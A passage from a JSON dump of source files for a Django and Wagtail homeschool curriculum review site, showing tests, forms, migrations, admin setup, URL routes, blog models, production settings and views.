self.assertEqual(list(response.context[app_name]), [curriculum])\n\n def test_view_curriculums_lists_filter_multiple_values(self):\n curriculums = Curriculum.objects.all().order_by(\"id\")\n grades = list(map(lambda x: x.grades.all().first().id, curriculums))[:4]\n query_string = \"?\" + \"&\".join(list(map(lambda x: f\"grade={x}\", grades)))\n response = self.client.get(f\"/{app_name}/{query_string}\")\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context[app_name]), 4)\n self.assertEqual(\n list(response.context[app_name]),\n list(curriculums.order_by(Sort.Values.NEWEST.label))[1:],\n )\n"
},
{
"alpha_fraction": 0.6659574508666992,
"alphanum_fraction": 0.6712765693664551,
"avg_line_length": 36.599998474121094,
"blob_id": "0c4110e214370976f8b2f506be4ddf6f5cd321f6",
"content_id": "9a1aac2c44604d7f966b0ecda1470163d928a9e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 940,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 25,
"path": "/fphs/utils/forms.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from captcha.fields import ReCaptchaField\nfrom captcha.widgets import ReCaptchaV3\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Submit\nfrom django.forms import CharField, EmailInput, Form, Textarea\nfrom django.utils.translation import ugettext_lazy as _\n\nFormHelper.use_custom_control = False\n\n\nclass ContactForm(Form):\n email = CharField(widget=EmailInput(attrs={\"placeholder\": \"Email\"}))\n message = CharField(widget=Textarea(attrs={\"placeholder\": \"Message\"}))\n captcha = ReCaptchaField(widget=ReCaptchaV3(attrs={\"required_score\": 0.85}))\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.layout = Layout(\n \"email\",\n \"message\",\n \"captcha\",\n Submit(\"submit\", _(\"Send Message\"), css_class=\"btn-secondary\"),\n )\n self.fields[\"captcha\"].label = False\n"
},
{
"alpha_fraction": 0.4997195601463318,
"alphanum_fraction": 0.5176668763160706,
"avg_line_length": 27.30158805847168,
"blob_id": "692952a2e348af285bf6ad58a6e445cc763d8263",
"content_id": "d55cd644969f2aec7273eb39ff1fc642971f086b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1783,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 63,
"path": "/fphs/users/migrations/0004_auto_20200728_2034.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.5 on 2020-07-28 20:34\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0003_user_favorite_curriculums'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='user',\n name='bio',\n field=models.TextField(blank=True, max_length=2000),\n ),\n migrations.AddField(\n model_name='user',\n name='facebook',\n field=models.URLField(blank=True),\n ),\n migrations.AddField(\n model_name='user',\n name='instagram',\n field=models.URLField(blank=True),\n ),\n migrations.AddField(\n model_name='user',\n name='location',\n field=models.CharField(blank=True, max_length=255),\n ),\n migrations.AddField(\n model_name='user',\n name='occupation',\n field=models.CharField(blank=True, max_length=255),\n ),\n migrations.AddField(\n model_name='user',\n name='pintrest',\n field=models.URLField(blank=True),\n ),\n migrations.AddField(\n model_name='user',\n name='public_reviews',\n field=models.BooleanField(default=True),\n ),\n migrations.AddField(\n model_name='user',\n name='twitter',\n field=models.URLField(blank=True),\n ),\n migrations.AddField(\n model_name='user',\n name='website',\n field=models.URLField(blank=True),\n ),\n migrations.AlterField(\n model_name='user',\n name='name',\n field=models.CharField(blank=True, max_length=255),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5894854664802551,
"alphanum_fraction": 0.6286353468894958,
"avg_line_length": 34.7599983215332,
"blob_id": "aa820f24b2d9cc7c7ad33f11ed7e5adcd663f42e",
"content_id": "b3ad4fc9279a556d4f6d3e34c62ae7dc335fa650",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 894,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 25,
"path": "/fphs/users/migrations/0005_favoritecurriculum.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.5 on 2020-07-30 22:48\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('curriculums', '0012_curriculum_image'),\n ('users', '0004_auto_20200728_2034'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='FavoriteCurriculum',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('curriculum', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='curriculums.Curriculum')),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n"
},
{
"alpha_fraction": 0.6808769702911377,
"alphanum_fraction": 0.6808769702911377,
"avg_line_length": 20.605262756347656,
"blob_id": "9b92daa8566a30a7e76dde8998f3887e84022611",
"content_id": "fa55b1de279555d80fa3eb9f7b72e7f6ed411ac5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 821,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 38,
"path": "/fphs/home/models.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nfrom wagtail.admin.edit_handlers import FieldPanel\nfrom wagtail.core.models import Page\nfrom wagtail.core.fields import RichTextField\n\n\nclass HomePage(Page):\n body = RichTextField(blank=True)\n\n content_panels = Page.content_panels + [\n FieldPanel(\"body\", classname=\"full\"),\n ]\n\n\nclass AboutPage(Page):\n body = RichTextField(blank=True)\n\n content_panels = Page.content_panels + [\n FieldPanel(\"body\", classname=\"full\"),\n ]\n\n\nclass PrivacyPolicyPage(Page):\n\n body = RichTextField(blank=True)\n\n content_panels = Page.content_panels + [\n FieldPanel(\"body\", classname=\"full\"),\n ]\n\n\nclass TermsOfServicePage(Page):\n body = RichTextField(blank=True)\n\n content_panels = Page.content_panels + [\n FieldPanel(\"body\", classname=\"full\"),\n ]\n"
},
{
"alpha_fraction": 0.7030237317085266,
"alphanum_fraction": 0.7030237317085266,
"avg_line_length": 24.027027130126953,
"blob_id": "4c794e65fc797793a185ab5e48a4cbc0a58aab22",
"content_id": "c8eb5e910c187d87e38c756c5eea169a790aaa2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 926,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 37,
"path": "/fphs/curriculums/admin.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\nfrom .models import (\n Curriculum,\n Category,\n Subject,\n Grade,\n Age,\n ReligiousPreference,\n Publisher,\n)\n\n\nclass CurriculumAdmin(admin.ModelAdmin):\n list_display = (\"id\", \"name\", \"description\", \"link\", \"is_confirmed\")\n list_display_links = (\"name\",)\n list_filter = (\"is_confirmed\", \"subjects__category\", \"subjects\", \"grades\", \"ages\")\n\n\nclass PublisherAdmin(admin.ModelAdmin):\n list_display = (\"id\", \"name\", \"link\")\n list_display_links = (\"name\",)\n\n\nclass SubjectAdmin(admin.ModelAdmin):\n list_display = (\"name\", \"category\")\n list_display_links = (\"name\",)\n\n\n# Register your models here.\nadmin.site.register(Curriculum, CurriculumAdmin)\nadmin.site.register(Publisher, PublisherAdmin)\nadmin.site.register(Subject, SubjectAdmin)\nadmin.site.register(Category)\nadmin.site.register(Grade)\nadmin.site.register(Age)\nadmin.site.register(ReligiousPreference)\n"
},
{
"alpha_fraction": 0.6783581972122192,
"alphanum_fraction": 0.6794776320457458,
"avg_line_length": 35.216217041015625,
"blob_id": "9d14ce8b327176cb5d0f46ffe8792f99222e7fa2",
"content_id": "813d11cd8a190faa99107432cb16302738bdd50b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2680,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 74,
"path": "/fphs/curriculums/tests/test_models.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth import get_user_model\nfrom django.test import TestCase\n\nfrom .test_utils import create_curriculum\nfrom fphs.curriculums.models import (\n Category,\n Subject,\n Grade,\n Age,\n ReligiousPreference,\n Publisher,\n Curriculum,\n Review,\n)\n\n\nclass CurriculumModelsTest(TestCase):\n ID = 1\n\n @classmethod\n def setUpTestData(cls):\n create_curriculum(CurriculumModelsTest.ID)\n\n def test_model_category(self):\n category = Category.objects.get(name=CurriculumModelsTest.ID)\n\n self.assertIsInstance(category, Category)\n self.assertEquals(category._meta.verbose_name, \"Category\")\n self.assertEquals(category._meta.verbose_name_plural, \"Categories\")\n\n def test_model_subject(self):\n category = Category.objects.get(name=CurriculumModelsTest.ID)\n subject = Subject.objects.get(name=CurriculumModelsTest.ID)\n\n self.assertIsInstance(subject, Subject)\n self.assertEquals(subject.category, category)\n\n def test_model_curriculum(self):\n curriculum = Curriculum.objects.get(name=CurriculumModelsTest.ID)\n subject = Subject.objects.get(name=CurriculumModelsTest.ID)\n grade = Grade.objects.get(name=CurriculumModelsTest.ID)\n age = Age.objects.get(name=CurriculumModelsTest.ID)\n religious_preference = ReligiousPreference.objects.get(\n name=CurriculumModelsTest.ID\n )\n publisher = Publisher.objects.get(name=CurriculumModelsTest.ID)\n user = get_user_model().objects.get(\n username=f\"username{CurriculumModelsTest.ID}\"\n )\n\n self.assertIsInstance(curriculum, Curriculum)\n self.assertEquals(curriculum.is_confirmed, False)\n self.assertEquals(list(curriculum.subjects.all()), [subject])\n self.assertEquals(list(curriculum.grades.all()), [grade])\n self.assertEquals(list(curriculum.ages.all()), [age])\n self.assertEquals(curriculum.religious_preference, religious_preference)\n self.assertEquals(curriculum.publisher, publisher)\n self.assertEquals(curriculum.created_by, user)\n\n def test_model_review(self):\n name = \"Test2\"\n curriculum = Curriculum.objects.get(name=CurriculumModelsTest.ID)\n user = get_user_model().objects.create_user(\n email=\"[email protected]\",\n username=f\"username{name}\",\n password=f\"password{name}\",\n )\n user.save()\n review = Review.objects.create(\n curriculum=curriculum, content=name, rating=5, user=user\n )\n\n self.assertEqual(list(curriculum.reviews.all()), [review])\n self.assertEqual(list(user.reviews.all()), [review])\n"
},
{
"alpha_fraction": 0.70333331823349,
"alphanum_fraction": 0.70333331823349,
"avg_line_length": 22.076923370361328,
"blob_id": "063c234ff1efa2356b38b2e8399b2cdd2508463c",
"content_id": "03cdccd7326eab5d4bbe9997c0e772441766f37c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 300,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 13,
"path": "/fphs/utils/admin.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\nfrom .models import Contact\n\n\nclass ContactAdmin(admin.ModelAdmin):\n list_display = (\"id\", \"email\", \"message\", \"replied\")\n list_display_links = (\"email\",)\n list_filter = (\"replied\",)\n\n\n# Register your models here.\nadmin.site.register(Contact, ContactAdmin)\n"
},
{
"alpha_fraction": 0.5740072131156921,
"alphanum_fraction": 0.6371841430664062,
"avg_line_length": 26.700000762939453,
"blob_id": "d0b74f711e4511ed6112c0b06bf6752f4443ff7c",
"content_id": "3004a99afa63d61998178562fa0cfe6a2ff7d386",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 554,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 20,
"path": "/fphs/curriculums/migrations/0012_curriculum_image.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.5 on 2020-07-29 16:00\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('wagtailimages', '0022_uploadedimage'),\n ('curriculums', '0011_auto_20200529_0234'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='curriculum',\n name='image',\n field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='wagtailimages.Image'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6461731195449829,
"alphanum_fraction": 0.6461731195449829,
"avg_line_length": 26.482759475708008,
"blob_id": "a128c9383b604284e2565314d598ccebd8d8157c",
"content_id": "094e887dd3d0008a451368ce84930d3f4f1fee46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 797,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 29,
"path": "/fphs/curriculums/urls.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.urls import include, path\n\nfrom .views import (\n CurriculumListView,\n detail,\n favorite,\n CurriculumCreateView,\n ReviewsIndexView,\n ReviewCreateView,\n ReviewUpdateView,\n)\n\nreview_urls = [\n path(\"\", ReviewsIndexView.as_view(), name=\"index\"),\n path(\"create/\", ReviewCreateView.as_view(), name=\"create\"),\n path(\"<str:uuid>/\", ReviewUpdateView.as_view(), name=\"update\"),\n]\n\napp_name = \"curriculums\"\n\nurlpatterns = [\n path(\"\", CurriculumListView.as_view(), name=\"index\"),\n path(\"create/\", CurriculumCreateView.as_view(), name=\"create\"),\n path(\"<slug:slug>/\", detail, name=\"detail\"),\n path(\"<slug:slug>/favorite/\", favorite, name=\"favorite\"),\n path(\n \"<slug:slug>/reviews/\", include((review_urls, \"reviews\"), namespace=\"reviews\")\n ),\n]\n"
},
{
"alpha_fraction": 0.6673076748847961,
"alphanum_fraction": 0.6711538434028625,
"avg_line_length": 29.58823585510254,
"blob_id": "7e3509d6f61df6a9e79c4681cd04d29951af8c0a",
"content_id": "cc52b4de97694b1728e81f924dd330eb3409d3d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1560,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 51,
"path": "/fphs/blog/models.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db import models\n\nfrom wagtail.core.models import Page\nfrom wagtail.core.fields import RichTextField\nfrom wagtail.admin.edit_handlers import FieldPanel\nfrom wagtail.search import index\n\nfrom wagtailmetadata.models import MetadataPageMixin\n\n\nclass BlogIndex(Page):\n intro = RichTextField(blank=True)\n\n content_panels = Page.content_panels + [FieldPanel(\"intro\", classname=\"full\")]\n\n def get_posts(self):\n return self.get_children().live().public().order_by(\"-first_published_at\")\n\n def paginate(self, request):\n page = request.GET.get(\"page\")\n paginator = Paginator(self.get_posts(), 10)\n try:\n pages = paginator.page(page)\n except PageNotAnInteger:\n pages = paginator.page(1)\n except EmptyPage:\n pages = paginator.page(paginator.num_pages)\n return pages\n\n def get_context(self, request, **kwargs):\n context = super().get_context(request)\n context[\"posts\"] = self.paginate(request)\n return context\n\n\nclass BlogPost(MetadataPageMixin, Page):\n description = models.CharField(max_length=255)\n body = RichTextField(blank=True)\n date = models.DateField(\"Post date\")\n\n search_fields = Page.search_fields + [\n index.SearchField(\"description\"),\n index.SearchField(\"body\"),\n ]\n\n content_panels = Page.content_panels + [\n FieldPanel(\"description\"),\n FieldPanel(\"body\", classname=\"full\"),\n FieldPanel(\"date\"),\n ]\n"
},
{
"alpha_fraction": 0.6051204800605774,
"alphanum_fraction": 0.6137048006057739,
"avg_line_length": 41.02531814575195,
"blob_id": "7cc78cbed0039f142980ce66c441bf267e2521ca",
"content_id": "35aa5a619f9581970837a6e1a8578b4720b25ddf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6640,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 158,
"path": "/config/settings/production.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "import logging\n\nimport sentry_sdk\nfrom sentry_sdk.integrations.django import DjangoIntegration\nfrom sentry_sdk.integrations.logging import LoggingIntegration\n\nfrom .base import * # noqa\nfrom .base import env\n\n# EMAIL\n# ------------------------------------------------------------------------------\n# Anymail\n# ------------------------------------------------------------------------------\n# https://anymail.readthedocs.io/en/stable/installation/#installing-anymail\nINSTALLED_APPS += [\"anymail\"] # noqa F405\n# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend\n# https://anymail.readthedocs.io/en/stable/installation/#anymail-settings-reference\n# https://anymail.readthedocs.io/en/stable/esps/mailgun\nANYMAIL = env.dict(\"DJANGO_ANYMAIL_OPTIONS\")\n\n\n# STORAGES\n# ------------------------------------------------------------------------------\n# https://django-storages.readthedocs.io/en/latest/#installation\nINSTALLED_APPS += [\"storages\"] # noqa F405\n# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings\nAWS_ACCESS_KEY_ID = env(\"DJANGO_AWS_ACCESS_KEY_ID\")\n# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings\nAWS_SECRET_ACCESS_KEY = env(\"DJANGO_AWS_SECRET_ACCESS_KEY\")\n# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings\nAWS_STORAGE_BUCKET_NAME = env.str(\"DJANGO_AWS_STORAGE_BUCKET_NAME\")\n# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings\nAWS_QUERYSTRING_AUTH = False\n# DO NOT change these unless you know what you\"re doing.\n_AWS_EXPIRY = 60 * 60 * 24 * 7\n# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings\nAWS_S3_OBJECT_PARAMETERS = {\n \"CacheControl\": f\"max-age={_AWS_EXPIRY}, s-maxage={_AWS_EXPIRY}, must-revalidate\"\n}\n# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings\nAWS_S3_REGION_NAME = env.str(\"DJANGO_AWS_S3_REGION_NAME\", default=None)\n# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#cloudfront\nAWS_S3_CUSTOM_DOMAIN = env(\"DJANGO_AWS_S3_CUSTOM_DOMAIN\", default=None)\naws_s3_domain = AWS_S3_CUSTOM_DOMAIN or f\"{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com\"\n# STATIC\n# ------------------------\nSTATICFILES_STORAGE = \"fphs.utils.storages.StaticRootS3Boto3Storage\"\nSTATIC_URL = f\"https://{aws_s3_domain}{STATIC_URL}\" # noqa F405\n# MEDIA\n# ------------------------------------------------------------------------------\nDEFAULT_FILE_STORAGE = \"fphs.utils.storages.MediaRootS3Boto3Storage\"\nMEDIA_URL = f\"https://{aws_s3_domain}{MEDIA_URL}\" # noqa F405\n\n\n# LOGGING\n# ------------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#logging\n# See https://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": True,\n \"formatters\": {\n \"django.server\": {\n \"()\": \"django.utils.log.ServerFormatter\",\n \"format\": \"[{server_time}] {message}\",\n \"style\": \"{\",\n },\n \"verbose\": {\n \"format\": \"%(levelname)s %(asctime)s %(module)s \"\n \"%(process)d %(thread)d %(message)s\"\n },\n },\n \"handlers\": {\n \"console\": {\n \"level\": \"INFO\",\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"verbose\",\n },\n \"django.server\": {\n \"level\": \"INFO\",\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"django.server\",\n },\n },\n \"loggers\": {\n \"django\": {\"handlers\": [\"console\"], \"level\": \"INFO\", \"propogate\": False},\n \"django.server\": {\n \"handlers\": [\"django.server\"],\n \"level\": \"INFO\",\n \"propagate\": False,\n },\n # Errors logged by the SDK itself\n \"sentry_sdk\": {\"handlers\": [\"console\"], \"level\": \"ERROR\", \"propagate\": False},\n },\n \"root\": {\"level\": \"ERROR\", \"handlers\": [\"console\"]},\n}\n\n# Sentry\n# ------------------------------------------------------------------------------\nSENTRY_DSN = env.str(\"DJANGO_SENTRY_DSN\")\nSENTRY_LOG_LEVEL = env.int(\"DJANGO_SENTRY_LOG_LEVEL\", default=logging.INFO)\n\nsentry_logging = LoggingIntegration(\n level=SENTRY_LOG_LEVEL, # Capture info and above as breadcrumbs\n event_level=logging.ERROR, # Send errors as events\n)\nintegrations = [sentry_logging, DjangoIntegration()]\nsentry_sdk.init(\n dsn=SENTRY_DSN,\n integrations=integrations,\n environment=env(\"DJANGO_SENTRY_ENVIRONMENT\", default=\"production\"),\n traces_sample_rate=env.float(\"DJANGO_SENTRY_TRACES_SAMPLE_RATE\", default=0.0),\n)\n\n\n# SECURITY\n# ------------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#secure-proxy-ssl-header\nSECURE_PROXY_SSL_HEADER = (\"HTTP_X_FORWARDED_PROTO\", \"https\")\n# https://docs.djangoproject.com/en/dev/ref/settings/#secure-ssl-redirect\nSECURE_SSL_REDIRECT = env.bool(\"DJANGO_SECURE_SSL_REDIRECT\", default=False)\n# https://docs.djangoproject.com/en/dev/ref/settings/#session-cookie-secure\nSESSION_COOKIE_SECURE = True\n# https://docs.djangoproject.com/en/dev/ref/settings/#csrf-cookie-secure\nCSRF_COOKIE_SECURE = True\n# https://docs.djangoproject.com/en/dev/topics/security/#ssl-https\n# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-seconds\n# TODO: set this to 60 seconds first and then to 518400 once you prove the former works\n# SECURE_HSTS_SECONDS = env.int(\"DJANGO_SECURE_HSTS_SECONDS\", default=60)\n# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-include-subdomains\nSECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool(\n \"DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS\", default=False\n)\n# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-preload\nSECURE_HSTS_PRELOAD = env.bool(\"DJANGO_SECURE_HSTS_PRELOAD\", default=False)\n# https://docs.djangoproject.com/en/dev/ref/middleware/#x-content-type-options-nosniff\nSECURE_CONTENT_TYPE_NOSNIFF = env.bool(\n \"DJANGO_SECURE_CONTENT_TYPE_NOSNIFF\", default=False\n)\n\n\n# TEMPLATES\n# ------------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#templates\nTEMPLATES[-1][\"OPTIONS\"][\"loaders\"] = [ # type: ignore[index] # noqa F405\n (\n \"django.template.loaders.cached.Loader\",\n [\n \"django.template.loaders.filesystem.Loader\",\n \"django.template.loaders.app_directories.Loader\",\n ],\n )\n]\n\n\n# Your stuff...\n# ------------------------------------------------------------------------------\n"
},
{
"alpha_fraction": 0.6865671873092651,
"alphanum_fraction": 0.6886993646621704,
"avg_line_length": 36.52000045776367,
"blob_id": "078273fb24aa4989c4d2660e53b3a5ba9c57edb4",
"content_id": "680ebe8091d0de7d6e29f2931b0f42d9ff5e2d13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 938,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 25,
"path": "/fphs/utils/tests.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from http import HTTPStatus\n\nfrom django.test import TestCase\n\n\nclass RobotsTxtTests(TestCase):\n def test_get_robot_txt(self):\n self._assert_robot_txt_by_domain(\"firstpickhomeschool.com\", \"Disallow: /admin\")\n\n def test_get_robot_txt_subdomain(self):\n self._assert_robot_txt_by_domain(\"test.firstpickhomeschool.com\", \"Disallow: /\")\n\n def test_post_robot_txt_disallowed(self):\n response = self.client.post(\"/robots.txt\")\n\n self.assertEqual(HTTPStatus.METHOD_NOT_ALLOWED, response.status_code)\n\n def _assert_robot_txt_by_domain(self, host, disallowed):\n response = self.client.get(\"/robots.txt\", HTTP_HOST=host)\n lines = response.content.decode().splitlines()\n\n self.assertEqual(response.status_code, HTTPStatus.OK)\n self.assertEqual(response[\"content-type\"], \"text/plain\")\n self.assertEqual(lines[0], \"User-Agent: *\")\n self.assertEqual(lines[1], disallowed)\n"
},
{
"alpha_fraction": 0.6279417276382446,
"alphanum_fraction": 0.63279789686203,
"avg_line_length": 33.7662353515625,
"blob_id": "b182a80961b20ba09f0037d5dffd85468cc0d94a",
"content_id": "13c581aafe3a3c12573d43e4b39fada6b06f96f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8031,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 231,
"path": "/fphs/curriculums/views.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.db.models import Avg, Q\nfrom django.db.models.functions import Coalesce\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.urls import reverse\nfrom django.views import generic\nfrom django.views.decorators.http import require_GET\nfrom fphs.users.models import User\nfrom fphs.utils.models import Metadata\nfrom .models import (\n Curriculum,\n CurriculumForm,\n ReviewForm,\n Category,\n Subject,\n Grade,\n Age,\n ReligiousPreference,\n Sort,\n Review,\n)\n\n\nclass CurriculumListView(generic.ListView):\n model = Curriculum\n template_name = \"curriculums/index.html\"\n context_object_name = \"curriculums\"\n paginate_by = 20\n\n def get_queryset(self):\n query = Q()\n filters = self.get_filters()\n order = self.get_sort().label\n search = self.request.GET.get(\"q\")\n\n if search:\n query.add(Q(name__icontains=search), Q.OR)\n query.add(Q(description__icontains=search), Q.OR)\n query.add(Q(publisher__name__icontains=search), Q.OR)\n\n if filters[\"categories\"]:\n query.add(Q(subjects__category__id__in=filters[\"categories\"]), Q.AND)\n\n if filters[\"subjects\"]:\n query.add(Q(subjects__id__in=filters[\"subjects\"]), Q.AND)\n\n if filters[\"grades\"]:\n query.add(Q(grades__id__in=filters[\"grades\"]), Q.AND)\n\n if filters[\"ages\"]:\n query.add(Q(ages__id__in=filters[\"ages\"]), Q.AND)\n\n if filters[\"preference\"]:\n query.add(Q(religious_preference__id__in=filters[\"preference\"]), Q.AND)\n\n return (\n Curriculum.objects.annotate(\n avg_rating=Coalesce(Avg(\"reviews__rating\"), 0.0)\n )\n .filter(is_confirmed=True)\n .filter(query)\n .distinct()\n .order_by(order)\n )\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"q\"] = self.request.GET.get(\"search\")\n context[\"filters\"] = self.get_filters()\n context[\"sorters\"] = Sort.Labels.choices\n context[\"sort\"] = self.request.GET.get(\"sort\")\n context[\"categories\"] = list(Category.objects.all())\n context[\"subjects\"] = list(Subject.objects.all())\n context[\"grades\"] = list(Grade.objects.all())\n context[\"ages\"] = list(Age.objects.all())\n context[\"preference\"] = list(ReligiousPreference.objects.all())\n context[\"metadata\"] = Metadata(\n self.request, \"Curriculums\", \"List of curriculums\"\n )\n return context\n\n def get_filters(self):\n def get_selections(name):\n try:\n return list(map(int, self.request.GET.getlist(name)))\n except:\n return []\n\n return {\n \"categories\": get_selections(\"category\"),\n \"subjects\": get_selections(\"subject\"),\n \"grades\": get_selections(\"grade\"),\n \"ages\": get_selections(\"age\"),\n \"preference\": get_selections(\"preference\"),\n }\n\n def get_sort(self):\n try:\n s = self.request.GET.get(\"sort\")\n return Sort.Values(int(s)) if s.isdigit() else Sort.Values.NEWEST\n except:\n return Sort.Values.NEWEST\n\n\n@require_GET\ndef detail(request, slug):\n curriculum = get_object_or_404(Curriculum, slug=slug, is_confirmed=True)\n categories = set(\n map(lambda s: s.category, curriculum.subjects.select_related(\"category\"))\n )\n reviews = curriculum.reviews.order_by(\"-created\")[:3]\n\n def get_values(items):\n return items[0], items[-1] if len(items) > 1 else None\n\n context = {\n \"curriculum\": curriculum,\n \"categories\": categories,\n \"subjects\": curriculum.subjects.all(),\n \"grades\": get_values(list(curriculum.grades.all())),\n \"ages\": get_values(list(curriculum.ages.all())),\n \"reviews\": reviews,\n \"avg_rating\": reviews.aggregate(avg_rating=Coalesce(Avg(\"rating\"), 0.0))[\n \"avg_rating\"\n ],\n }\n return render(request, \"curriculums/detail.html\", context)\n\n\n@login_required\ndef favorite(request, slug):\n curriculum = get_object_or_404(Curriculum, slug=slug, is_confirmed=True)\n # Redirect to detail page after login\n if request.method == \"GET\":\n return HttpResponseRedirect(\n reverse(\"curriculums:detail\", kwargs={\"slug\": curriculum.slug})\n )\n\n # Save favorite and go back to previous page\n user: User = request.user\n if curriculum in user.favorite_curriculums.all():\n user.favorite_curriculums.remove(curriculum)\n else:\n user.favorite_curriculums.add(curriculum)\n user.save()\n return HttpResponseRedirect(request.POST.get(\"next\", \"/\"))\n\n\nclass CurriculumCreateView(LoginRequiredMixin, SuccessMessageMixin, generic.CreateView):\n form_class = CurriculumForm\n template_name = \"curriculums/create.html\"\n success_url = \"/curriculums/create/\"\n success_message = \"Your request to add a curriculum was submitted\"\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n\nclass ReviewsIndexView(generic.ListView):\n model: Review\n template_name = \"reviews/index.html\"\n context_object_name = \"reviews\"\n paginate_by = 20\n\n def get_queryset(self):\n curriculum = get_object_or_404(\n Curriculum, slug=self.kwargs.get(\"slug\"), is_confirmed=True\n )\n return Review.objects.filter(curriculum_id=curriculum.id)\n\n def get_context_data(self, **kwargs):\n context = 